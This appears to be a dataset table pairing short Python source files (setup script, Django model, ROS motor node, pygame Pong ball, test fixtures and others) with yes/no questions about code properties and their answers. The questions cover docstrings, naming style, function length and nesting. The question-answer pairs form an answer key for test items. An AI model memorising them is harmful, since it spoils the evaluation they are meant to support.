source string | points list | n_points int64 | path string | repo string |
|---|---|---|---|---|
from setuptools import setup, find_packages
from setuptools.command.install import install
import os
import io
# Absolute directory containing this setup.py; used below to resolve
# sibling files (e.g. requirements.txt) regardless of the current cwd.
SETUP_DIR = os.path.dirname(os.path.abspath(__file__))
# List all of your Python package dependencies in the
# requirements.txt file
def readfile(filename, split=False):
    """Read a UTF-8 text file.

    :param filename: path of the file to read
    :param split: when true, return a list of lines (split on "\n")
                  instead of the raw string
    :return: file contents as a string, or a list of strings
    """
    with io.open(filename, encoding="utf-8") as handle:
        content = handle.read()
    return content.split("\n") if split else content
# Long-description text: the README minus its title block (first 3 lines).
readme = readfile("README.rst", split=True)[3:] # skip title
# For requirements not hosted on PyPi place listings
# into the 'requirements.txt' file.
requires = [] # minimal requirements listing
# Full license text; appended to the long description passed to setup().
source_license = readfile("LICENSE")
class InstallCommand(install):
    """Custom ``install`` command that also installs requirements.txt."""

    def run(self):
        # Perform the standard setuptools installation first.
        install.run(self)
        # Then pull in the runtime requirements with pip.
        import subprocess
        requirements_path = os.path.join(SETUP_DIR, 'requirements.txt')
        subprocess.call(['pip', 'install', '-r', requirements_path])
# Register the plugin distribution with setuptools.
setup(name='mapclientplugins.datatrimmerstep',
      version='0.1.0',
      description='',
      # README (minus its title) followed by the full license text.
      long_description='\n'.join(readme) + source_license,
      classifiers=[
          "Development Status :: 3 - Alpha",
          "License :: OSI Approved :: Apache Software License",
          "Programming Language :: Python",
      ],
      # Hook the custom command so requirements.txt is installed too.
      cmdclass={'install': InstallCommand,},
      author='Mahyar Osanlouy',
      author_email='',
      url='',
      license='APACHE',
      packages=find_packages(exclude=['ez_setup',]),
      namespace_packages=['mapclientplugins'],
      include_package_data=True,
      zip_safe=False,
      install_requires=requires,
      )
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
}... | 3 | setup.py | rchristie/mapclientplugins.datatrimmerstep |
from django.db import models
import os
def get_image_path(instance, filename):
    """Build the upload path for a pet photo: pics/<instance id>/<filename>."""
    parts = ('pics', str(instance.id), filename)
    return os.path.join(*parts)
# Create your models here.
class Pets(models.Model):
    """Adoptable pet with photo, species, size and age classification."""
    # Photo uploads land in pics/<pet id>/<filename> (see get_image_path).
    pet_foto = models.ImageField(upload_to=get_image_path, blank=True, null=True)
    # Species codes: 'C' = Cachorro (dog), 'G' = Gato (cat).
    DOG = 'C'
    CAT = 'G'
    ESPECIE_CHOICES = (
        (DOG, 'Cachorro'),
        (CAT, 'Gato')
    )
    especie = models.CharField(max_length=1, choices=ESPECIE_CHOICES, default=DOG)
    # Size codes: small / medium / large.
    PEQ = 'Pq'
    MED = 'Md'
    GDE = 'Gd'
    PORTE_CHOICES = (
        (PEQ, 'Pequeno'),
        (MED, 'Médio'),
        (GDE, 'Grande')
    )
    porte = models.CharField(max_length=2, choices=PORTE_CHOICES, default=GDE)
    # Age bracket codes: 'F' = Filhote (young), 'A' = Adulto (adult).
    FILHOTE = 'F'
    ADULTO = 'A'
    IDADE_CHOICES = (
        (FILHOTE, 'Filhote'),
        (ADULTO, 'Adulto')
    )
    nome = models.CharField(max_length=50, null=False)
    idade = models.CharField(max_length=1, choices=IDADE_CHOICES, default=ADULTO)
    raca = models.CharField(max_length=100, null=False)
    obs = models.TextField(max_length=500, null=True, blank=True)

    def __str__(self):
        # Multi-line human-readable dump of all fields.
        return "pet_foto: {}\nEspecie: {}\nPorte: {}\nNome: {}\nIdade: {}\nRaça: {}\nObs.: {}"\
            .format(self.pet_foto, self.especie, self.porte, self.nome, self.idade, self.raca, self.obs)
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
}... | 3 | src/doghouse/models.py | JuniorGunner/ConcilBackendTest |
#!/usr/bin/env python
# -*- coding: utf-8
from __future__ import unicode_literals
import platform as pf
from . import core
class PlatformCollector(object):
    """Collector exposing the interpreter's platform details as a gauge."""

    def __init__(self, registry=core.REGISTRY, platform=None):
        # `platform` may be injected for testing; defaults to the stdlib module.
        self._platform = platform if platform is not None else pf
        labels = self._info()
        # Jython exposes JVM details through platform.java_ver().
        if self._platform.system() == "Java":
            labels.update(self._java())
        self._metrics = [
            self._add_metric("python_info", "Python platform information", labels)
        ]
        if registry:
            registry.register(self)

    def collect(self):
        """Return the metrics gathered once at construction time."""
        return self._metrics

    @staticmethod
    def _add_metric(name, documentation, data):
        # Label names and values must line up pairwise.
        keys = list(data.keys())
        gauge = core.GaugeMetricFamily(name, documentation, labels=keys)
        gauge.add_metric([data[k] for k in keys], 1)
        return gauge

    def _info(self):
        """Collect generic interpreter information."""
        major, minor, patchlevel = self._platform.python_version_tuple()
        return {
            "version": self._platform.python_version(),
            "implementation": self._platform.python_implementation(),
            "major": major,
            "minor": minor,
            "patchlevel": patchlevel,
        }

    def _java(self):
        """Collect JVM details (only meaningful on Jython)."""
        java_version, _, vminfo, osinfo = self._platform.java_ver()
        vm_name, vm_release, vm_vendor = vminfo
        return {
            "jvm_version": java_version,
            "jvm_release": vm_release,
            "jvm_vendor": vm_vendor,
            "jvm_name": vm_name,
        }
# Eagerly create a collector registered on the default REGISTRY at import time.
PLATFORM_COLLECTOR = PlatformCollector()
"""PlatformCollector in default Registry REGISTRY"""
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": ... | 3 | Python/venv/lib/python3.7/site-packages/prometheus_client/platform_collector.py | HenriqueBuzin/TCC |
# -*- coding: utf-8 -*- #
# Copyright 2016 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command for deleting network peerings."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.compute import base_classes
from googlecloudsdk.calliope import base
from googlecloudsdk.core import properties
class Delete(base.DeleteCommand):
    """Delete a Google Compute Engine network peering."""

    @staticmethod
    def Args(parser):
        """Register the positional name and the required --network flag."""
        parser.add_argument(
            'name',
            help='The name of the peering to delete.')
        parser.add_argument(
            '--network',
            required=True,
            help='The name of the network in the current project containing the '
                 'peering.')

    def Run(self, args):
        """Issues the request necessary for deleting the peering."""
        holder = base_classes.ComputeApiHolder(self.ReleaseTrack())
        messages = holder.client.messages
        remove_request = messages.ComputeNetworksRemovePeeringRequest(
            network=args.network,
            networksRemovePeeringRequest=messages.NetworksRemovePeeringRequest(
                name=args.name),
            project=properties.VALUES.core.project.GetOrFail())
        return holder.client.MakeRequests(
            [(holder.client.apitools_client.networks, 'RemovePeering',
              remove_request)])
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": tru... | 3 | lib/surface/compute/networks/peerings/delete.py | kustodian/google-cloud-sdk |
"""Select2 view implementation."""
import json
from dal.views import BaseQuerySetView
from django import http
from django.utils.translation import ugettext as _
class Select2ViewMixin(object):
    """View mixin to render a JSON response for Select2."""

    def get_results(self, context):
        """Return data for the 'results' key of the response."""
        results = []
        for result in context['object_list']:
            results.append({
                'id': self.get_result_value(result),
                'text': self.get_result_label(result),
            })
        return results

    def render_to_response(self, context):
        """Return a JSON response in Select2 format."""
        q = self.request.GET.get('q', None)
        create_option = []
        if self.create_field and q:
            page_obj = context.get('page_obj', None)
            # Only offer the "create" entry on the first page of results.
            if page_obj is None or page_obj.number == 1:
                create_option = [{
                    'id': q,
                    'text': _('Create "%(new_value)s"') % {'new_value': q},
                    'create_id': True,
                }]
        payload = {
            'results': self.get_results(context) + create_option,
            'pagination': {
                'more': self.has_more(context)
            }
        }
        return http.HttpResponse(
            json.dumps(payload),
            content_type='application/json',
        )
class Select2QuerySetView(Select2ViewMixin, BaseQuerySetView):
    """List options for a Select2 widget.

    Combines the queryset filtering of BaseQuerySetView with the
    Select2 JSON rendering provided by Select2ViewMixin.
    """
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": fals... | 3 | env/lib/python2.7/site-packages/dal_select2/views.py | NITKOSG/InfoGami |
from second.second import checkLinkedList, linked_list
import pytest
def test_1(list1):
    """A list whose values are all unique must be reported as False."""
    assert checkLinkedList(list1) == False
def test_2(list2):
    """A list containing a repeated value must be reported as True."""
    assert checkLinkedList(list2) == True
@pytest.fixture
def list1():
    """Linked list A -> B -> C: all values unique."""
    ll = linked_list()
    for value in ("A", "B", "C"):
        ll.insert(value)
    return ll
@pytest.fixture
def list2():
    """Linked list A -> B -> A: contains a duplicate value."""
    ll = linked_list()
    for value in ("A", "B", "A"):
        ll.insert(value)
    return ll
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer":... | 3 | Interviews/second/tests/test_second.py | makkahwi/data-structures-and-algorithms |
#!/usr/bin/env python
#encoding: utf8
import sys, rospy, math
from pimouse_ros.msg import MotorFreqs
from geometry_msgs.msg import Twist
class Motor():
    """ROS node body driving the Raspberry Pi Mouse motors.

    Subscribes to raw frequency commands ('motor_raw') and velocity
    commands ('cmd_vel') and writes the resulting left/right pulse
    frequencies to the rtmotor device files.
    """

    def __init__(self):
        # Power the motor driver on; bail out if the device is unavailable.
        if not self.set_power(True): sys.exit(1)
        # Make sure the motors are powered off when the node shuts down.
        rospy.on_shutdown(self.set_power)
        self.sub_raw = rospy.Subscriber('motor_raw', MotorFreqs, self.callback_raw_freq)
        self.sub_cmd_vel = rospy.Subscriber('cmd_vel', Twist, self.callback_cmd_vel)
        self.last_time = rospy.Time.now()
        self.using_cmd_vel = False

    def set_power(self, onoff=False):
        """Switch the motor driver on/off via /dev/rtmotoren0.

        :param onoff: True to enable the driver, False to disable it.
        :return: True on success, False if the device is not writable.
        """
        en = "/dev/rtmotoren0"
        try:
            with open(en, 'w') as f:
                f.write("1\n" if onoff else "0\n")
            self.is_on = onoff
            return True
        except IOError:  # narrowed from bare except: don't swallow SystemExit etc.
            rospy.logerr("cannot write to " + en)
            return False

    def set_raw_freq(self, left_hz, right_hz):
        """Write left/right motor pulse frequencies (Hz) to the device files."""
        if not self.is_on:
            rospy.logerr("not enpowered")
            return
        try:
            with open("/dev/rtmotor_raw_l0", 'w') as lf,\
                 open("/dev/rtmotor_raw_r0", 'w') as rf:
                lf.write(str(int(round(left_hz))) + "\n")
                rf.write(str(int(round(right_hz))) + "\n")
        except IOError:  # narrowed from bare except
            rospy.logerr("cannot write to rtmotor_raw_*")

    def callback_raw_freq(self, message):
        """Forward a MotorFreqs message straight to the motors."""
        self.set_raw_freq(message.left_hz, message.right_hz)

    def callback_cmd_vel(self, message):
        """Convert a Twist (m/s, rad/s) into left/right wheel frequencies."""
        # 80000/(9*pi): robot-specific linear-velocity-to-pulse conversion.
        forward_hz = 80000.0*message.linear.x/(9*math.pi)
        rot_hz = 400.0*message.angular.z/math.pi
        self.set_raw_freq(forward_hz-rot_hz, forward_hz+rot_hz)
        self.using_cmd_vel = True
        self.last_time = rospy.Time.now()
if __name__ == '__main__':
    rospy.init_node('motors')
    m = Motor()
    rate = rospy.Rate(10)
    while not rospy.is_shutdown():
        # Safety stop: zero the motors if no cmd_vel arrived for >= 1 second.
        if m.using_cmd_vel and rospy.Time.now().to_sec() - m.last_time.to_sec() >= 1.0:
            m.set_raw_freq(0,0)
            m.using_cmd_vel = False
        rate.sleep()
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": ... | 3 | scripts/motors1.py | aoko5/pimouse_ros |
#
# @lc app=leetcode id=102 lang=python3
#
# [102] Binary Tree Level Order Traversal
#
# @lc code=start
# Definition for a binary tree node.
class TreeNode:
    """Binary tree node holding a value and optional left/right children."""

    def __init__(self, val=0, left=None, right=None):
        self.val, self.left, self.right = val, left, right
from typing import List, Optional
class Solution:
def levelOrder(self, root: Optional[TreeNode]) -> List[List[int]]:
ans = []
def _larger(n):
for i in range(len(ans), n + 1):
ans.append([])
def _traversal(node, depth):
if node != None:
_larger(depth)
tmp = ans[depth]
tmp.append(node.val)
_traversal(node.left, depth + 1)
_traversal(node.right, depth + 1)
_traversal(root, 0)
return ans
# @lc code=end
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answ... | 3 | Difficulty/Medium/102.binary-tree-level-order-traversal.py | ryderfang/LeetCode |
import time
import dlib
import cv2
from interface_dummy import Connection
class Main(object):
    """Webcam face-distance estimator.

    Captures frames, detects faces with dlib, and sends the widest
    detected face width (a pixel-space proxy for distance) over the
    Connection interface.
    """

    def __init__(self):
        self.camera = cv2.VideoCapture(0)
        self.camera.set(cv2.CAP_PROP_FRAME_WIDTH, 1280)
        self.camera.set(cv2.CAP_PROP_FRAME_HEIGHT, 720)
        self.face_detector_dlib = dlib.get_frontal_face_detector()
        # Cascade detector kept for comparison experiments; unused in run().
        self.face_detector_cascade = cv2.CascadeClassifier("haarcascade_frontalface_alt2.xml")
        self.connection = Connection()
        self.connection.start()

    def run(self):
        """Main loop: grab a frame, detect faces, report the widest one.

        The original timing code used time.clock(), which was removed in
        Python 3.8; it only fed commented-out debug prints, so the dead
        timing/comparison code was removed rather than ported.
        """
        while True:
            ok, image = self.camera.read()
            if not ok:
                continue
            detections = self.face_detector_dlib(image, 1)
            # Track the widest detected face: the closer the face, the
            # wider its bounding rectangle in pixels.
            max_width = 0
            for rect in detections:
                if rect.width() > max_width:
                    max_width = rect.width()
            if max_width > 0:
                print(max_width)
                self.connection.send("distance", str(max_width))
if __name__ == "__main__":
    # Guard so importing this module does not open the camera and block.
    app = Main()
    app.run()
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"... | 3 | facedistance/main.py | imakin/ProsesKiller |
from typing import Union, List, Tuple, Type
from deeprob.spn.structure.leaf import Leaf
from deeprob.spn.structure.node import Node, Sum, Product, bfs
def collect_nodes(root: Node) -> List[Node]:
    """
    Get all the nodes in a SPN.
    :param root: The root of the SPN.
    :return: A list of nodes.
    """
    # Filtering with the base Node type keeps every node.
    return filter_nodes_by_type(root, Node)
def filter_nodes_by_type(
    root: Node,
    ntype: Union[Type[Node], Tuple[Type[Node], ...]] = Node
) -> List[Union[Node, Leaf, Sum, Product]]:
    """
    Get the nodes of some specified types in a SPN.
    :param root: The root of the SPN.
    :param ntype: The node type. Multiple node types can be specified as a tuple.
    :return: A list of nodes of some specific types, in BFS order.
    """
    return [node for node in bfs(root) if isinstance(node, ntype)]
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return t... | 3 | deeprob/spn/utils/filter.py | fedelux3/deeprob-kit |
import pytest
import sys
import trio
import inspect
import re
import time
pytestmark = pytest.mark.trio
io_test_pattern = re.compile("io_.*")
async def tests(subtests):
    # Discover every io_* coroutine in this module and run them all
    # concurrently, each reported as its own pytest subtest.
    def find_io_tests(subtests, ignored_names):
        # Yield (runner, *args) tuples for module-level functions whose name
        # matches io_* and is not explicitly excluded.
        functions = inspect.getmembers(sys.modules[__name__], inspect.isfunction)
        for (f_name, function) in functions:
            if f_name in ignored_names:
                continue
            if re.search(io_test_pattern, f_name):
                yield (run, subtests, f_name, function)

    async def run(subtests, test_name, test_function):
        # Execute one discovered test within its own subtest context so a
        # failure does not abort the sibling tests.
        with subtests.test(msg=test_name):
            await test_function()

    # Exclude this orchestrator itself from discovery.
    self_name = inspect.currentframe().f_code.co_name
    async with trio.open_nursery() as nursery:
        for io_test in find_io_tests(subtests, {self_name}):
            nursery.start_soon(*io_test)
# Maximum tolerated drift (seconds) between requested and measured sleep.
accepted_error = 0.1

async def io_test_1():
    await assert_sleep_duration_ok(1)

async def io_test_2():
    await assert_sleep_duration_ok(2)

async def io_test_3():
    await assert_sleep_duration_ok(3)

async def io_test_4():
    await assert_sleep_duration_ok(4)

async def assert_sleep_duration_ok(duration):
    # Sleep for `duration` seconds and check trio honoured it within the
    # accepted_error tolerance (wall-clock measured).
    start = time.time()
    await trio.sleep(duration)
    actual_duration = time.time() - start
    assert abs(actual_duration - duration) < accepted_error
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": true
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (e... | 3 | tests/base_test.py | ibalagurov/async_api_tests |
# NOTE(review): this file is a jedi completion-test fixture. The `#?` and
# `#!` comments are assertions consumed by the test runner and refer to the
# line that follows them — do not edit, reflow, or separate them.
class Super(object):
    attribute = 3

    def func(self):
        return 1

    class Inner():
        pass
# NOTE(review): intentional duplicate/shadowing definitions below — they are
# the subject of the jedi goto/completion assertions, not mistakes.
class Sub(Super):
    #? 13 Sub.attribute
    def attribute(self):
        pass
    #! 8 ['attribute = 3']
    def attribute(self):
        pass
    #! 4 ['def func']
    func = 3
    #! 12 ['def func']
    class func(): pass
    #! 8 ['class Inner']
    def Inner(self): pass
# -----------------
# Finding self
# -----------------
# NOTE(review): jedi fixture exercising `self` attribute discovery across
# nested classes, duplicate __init__ definitions and closures. Keep as-is.
class Test1:
    class Test2:
        def __init__(self):
            self.foo_nested = 0
            #? ['foo_nested']
            self.foo_
            #?
            self.foo_here

    def __init__(self, self2):
        self.foo_here = 3
        #? ['foo_here', 'foo_in_func']
        self.foo_
        #? int()
        self.foo_here
        #?
        self.foo_nested
        #?
        self.foo_not_on_self
        #? float()
        self.foo_in_func
        self2.foo_on_second = ''

        def closure():
            self.foo_in_func = 4.

    def bar(self):
        self = 3
        self.foo_not_on_self = 3
# NOTE(review): jedi fixture — checks inherited `self` attributes are found.
class SubTest(Test1):
    def __init__(self):
        self.foo_sub_class = list

    def bar(self):
        #? ['foo_here', 'foo_in_func', 'foo_sub_class']
        self.foo_
        #? int()
        self.foo_here
        #?
        self.foo_nested
        #?
        self.foo_not_on_self
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answe... | 3 | test/completion/inheritance.py | mrclary/jedi |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
"""
Steps:
1. Given a CSV export of F_YL_LEARNER
2. Create a unique list of all IBM email addresses
3. Perform a lookup in the Bluepages API
4. Populate MongoDB with this information
5. Then create a DbViz insert file of the Bluepages API information
"""
import codecs
from databp import QueryBluepagesEndpoint
def load_csv_file(f_yl_learner_input): # STEP 1 and 2
    """Extract the email-address column from a tab-separated export.

    Skips the header row, takes column index 3 of each remaining line,
    and strips surrounding whitespace and double quotes.

    :param f_yl_learner_input: path to the F_YL_LEARNER export file
    :return: list of email addresses (may contain duplicates)
    """
    # Context manager guarantees the handle is closed even on error
    # (the original opened/closed the file manually).
    with codecs.open(f_yl_learner_input, "r", encoding="utf-8") as fo:
        lines = fo.readlines()
    emails = [line.split("\t")[3].strip().replace('"', '') for line in lines[1:]]
    print("Total Email Addresses: ", len(emails))
    return emails
def bluepages_lookup(email_addresses):
    """Bulk-resolve email addresses via the Bluepages endpoint (STEPS 3-4)."""
    loaded_count = QueryBluepagesEndpoint().by_internet_address_bulk(email_addresses)
    print("Total Loaded: ", loaded_count)
def main(f_yl_learner_input):
    """Run the pipeline: parse the export, then look the addresses up."""
    bluepages_lookup(load_csv_file(f_yl_learner_input))
if __name__ == "__main__":
import plac
plac.call(main)
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fe... | 3 | python/databp/scripts/bp_query_via_fyllearner.py | jiportilla/ontology |
from unittest import TestCase
from tests import get_data
from pytezos.michelson.converter import build_schema, decode_micheline, encode_micheline, micheline_to_michelson
class StorageTestKT1HodLKwRxAWonG3jzAdHmVmKvPiNaXbpxV(TestCase):
    """Round-trip and formatting checks for the KT1HodL... contract storage."""

    @classmethod
    def setUpClass(cls):
        cls.maxDiff = None  # show full diffs on assertion failure
        cls.contract = get_data('storage/zeronet/KT1HodLKwRxAWonG3jzAdHmVmKvPiNaXbpxV.json')

    def test_storage_encoding_KT1HodLKwRxAWonG3jzAdHmVmKvPiNaXbpxV(self):
        """Decoding then re-encoding the storage must reproduce it exactly."""
        script = self.contract['script']
        type_expr, val_expr = script['code'][1], script['storage']
        schema = build_schema(type_expr)
        round_tripped = encode_micheline(decode_micheline(val_expr, type_expr, schema), schema)
        self.assertEqual(val_expr, round_tripped)

    def test_storage_schema_KT1HodLKwRxAWonG3jzAdHmVmKvPiNaXbpxV(self):
        """The parameter section must yield a valid schema."""
        _ = build_schema(self.contract['script']['code'][0])

    def test_storage_format_KT1HodLKwRxAWonG3jzAdHmVmKvPiNaXbpxV(self):
        """Code and storage must be convertible to Michelson source."""
        _ = micheline_to_michelson(self.contract['script']['code'])
        _ = micheline_to_michelson(self.contract['script']['storage'])
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
... | 3 | tests/storage/cases/test_KT1HodLKwRxAWonG3jzAdHmVmKvPiNaXbpxV.py | juztin/pytezos-1 |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
from abc import ABC, abstractmethod
class AbstractLogger(ABC):
    """
    Abstract base class for all the logger implementations of this tool
    """
    # Class-level default; enable_debug() sets a per-instance override.
    __debug = False

    @abstractmethod
    def info(self, tag, message):
        """Log an informational message under the given tag."""
        raise NotImplementedError

    @abstractmethod
    def error(self, tag, message):
        """Log an error message under the given tag."""
        raise NotImplementedError

    @abstractmethod
    def debug(self, tag, message):
        """Log a debug message under the given tag."""
        raise NotImplementedError

    @abstractmethod
    def warn(self, tag, message):
        """Log a warning message under the given tag."""
        raise NotImplementedError

    def enable_debug(self):
        """Turn on debug logging for this logger instance."""
        self.__debug = True

    def debug_enabled(self):
        """Return True if enable_debug() has been called on this instance."""
        return self.__debug
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fe... | 3 | core/interfaces/logger.py | microsoft/Guardinel |
from glob import glob
import config
import errno
import os
def unique_id(msg):
    """Allocate the next trial number and create its weights directory.

    The cwd is expected to hold a single "<n>.txt" counter file; it is
    renamed to "<n+1>.txt", the weights directory for trial n is created,
    and *msg* is written into msg.txt inside it.

    :param msg: free-form description of this trial
    :return: the trial number allocated for this run
    """
    ext = '.txt'
    counter_file = glob("*" + ext)[0]
    num_trail = int(counter_file.split(".")[0])
    # Bump the counter so the next run gets a fresh id.
    os.rename(counter_file, "./" + str(num_trail + 1) + ext)
    outdir = os.path.join("../weights", config.summary_prefix + "%02d" % num_trail)
    mkdir_p(outdir)
    with open(outdir + "/msg.txt", "w+") as handle:
        handle.write(msg)
    return num_trail
def mkdir_p(path):
    """Create *path* and any missing parents, like ``mkdir -p``.

    Silently succeeds when the directory already exists; any other
    OSError is re-raised.
    """
    try:
        os.makedirs(path)
    except OSError as exc:  # Python >2.5
        if not (exc.errno == errno.EEXIST and os.path.isdir(path)):
            raise
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
... | 3 | train/faci_training.py | Dung-Han-Lee/Pointcloud-based-Row-Detection-using-ShellNet-and-PyTorch |
import os
from dotenv import load_dotenv
from helpers import RequestHandler
class Order(RequestHandler):
    """API wrapper around the trading 'orders' endpoints."""

    def place_order(self, isin: str, expires_at: str, quantity: int, side: str):
        """Create a new order on the venue configured via the MIC env var."""
        load_dotenv()  # make sure MIC is available from .env
        payload = {
            "isin": isin,
            "expires_at": expires_at,
            "side": side,
            "quantity": quantity,
            "venue": os.getenv("MIC")
        }
        return self.post_data(f'orders/', payload)

    def activate_order(self, order_id):
        """Activate a previously placed order."""
        return self.post_data(f'orders/{order_id}/activate/', {})

    def get_order(self, order_id):
        """Fetch the details of a single order."""
        load_dotenv()
        return self.get_data_trading(f'orders/{order_id}/')
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
}... | 3 | models/Order.py | lemon-markets/content-dollar-cost-average |
import pygame
from random import randint
BLACK = (0,0,0)
import numpy as np
class Ball(pygame.sprite.Sprite):
    """Pong ball sprite whose movement is clamped to the table area."""

    def __init__(self, color, width, height, twidth, theight):
        super().__init__()
        # Transparent surface with a filled rectangle as the ball image.
        self.image = pygame.Surface([width, height])
        self.image.fill(BLACK)
        self.image.set_colorkey(BLACK)
        self.twidth = twidth
        self.width = width
        self.theight = theight
        self.height = height
        pygame.draw.rect(self.image, color, [0, 0, width, height])
        self.velocity = [randint(4, 8), randint(-8, 8)]
        self.rect = self.image.get_rect()

    def update(self):
        """Advance one step, keeping the ball inside the table bounds."""
        # Clipping solves a lot of glitches should have done this earlier
        new_x = self.rect.x + self.velocity[0]
        self.rect.x = min(max(new_x, 0), self.twidth - self.width)
        new_y = self.rect.y + self.velocity[1]
        self.rect.y = min(max(new_y, 0), self.theight - self.height)

    def bounce(self):
        """Reverse horizontal direction and randomise vertical speed."""
        self.velocity[0] = -self.velocity[0]
        self.velocity[1] = randint(-8, 8)

    def posi(self):
        """Return the ball's rect (position and size)."""
        return self.rect

    def spawn(self):
        """Re-centre the ball with a fresh random velocity; always True."""
        self.velocity = [np.random.choice([-1, 1]) * randint(4, 8), randint(-8, 8)]
        self.rect.x = (self.twidth - self.width) / 2
        self.rect.y = (self.theight - self.height) / 2
        return True
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than cla... | 3 | ball.py | hex-plex/Pong-ReinforcementLearning |
import numpy as np
import matplotlib.pyplot as plt
# Part A: Numerical Differentiation Closure
def numerical_diff(f, h):
    """Return a function approximating f' with the forward difference
    quotient (f(x+h) - f(x)) / h at fixed step size h."""
    def derivative(x):
        return (f(x + h) - f(x)) / h
    return derivative
# Part B:
# Compare the numerical derivative of ln(x) with the analytical 1/x
# for several step sizes h over x in [0.2, 0.4].
f = np.log
x = np.linspace(0.2, 0.4, 500)
h = [1e-1, 1e-7, 1e-15]
y_analytical = 1/x
result = {}
for i in h:
    y = numerical_diff(f,i)(x)
    result[i] = y
# Plotting
plt.figure(figsize = (8,5))
plt.plot(x, y_analytical, 'x-', label='Analytical Derivative')
for i in h:
    plt.plot(x, result[i], label='Estimated derivative h = '+str(i))
plt.xlabel("X value")
plt.ylabel("Derivative Value at X")
plt.title("Differentiation Value at X on various h value")
plt.legend()
# Part C:
print("Answer to Q-a: When h value is 1e-7, it most closely approximates the true derivative. \n",
      "When h value is too small: The approximation is jumping around stepwise and not displaying a smooth curve approximation, it amplifies floating point errors in numerical operation such as rounding and division\n",
      "When h value is too large: The approximation is lower than the true value, it doesn't provide a good approximation to the derivative\n")
print("Answer to Q-b: Automatic differentiation avoids the problem of not choosing a good h value. \n"
      "The finite difference approach is quick and easy but suffers from accuracy and stability problems.\n"
      "Symbolic derivatives can be evaluated to machine precision, but can be costly to evaluate.\n"
      "Automatic differentiation (AD) overcomes both of these deficiencies. It is less costly than symbolic differentiation while evaluating derivatives to machine precision.\n"
      "AD uses forward or backward modes to differentiate, via Computational Graph, chain rule and evaluation trace.")
# Show plot
plt.show()
# plt.savefig('P1_fig.png')
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": true
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (e... | 3 | homework/HW4/HW4-final/P1.py | TangJiahui/cs107_system_devlopment |
from typing import List, TypeVar, Sequence, Dict, Tuple
from polyhedral_analysis.coordination_polyhedron import CoordinationPolyhedron
T = TypeVar('T')
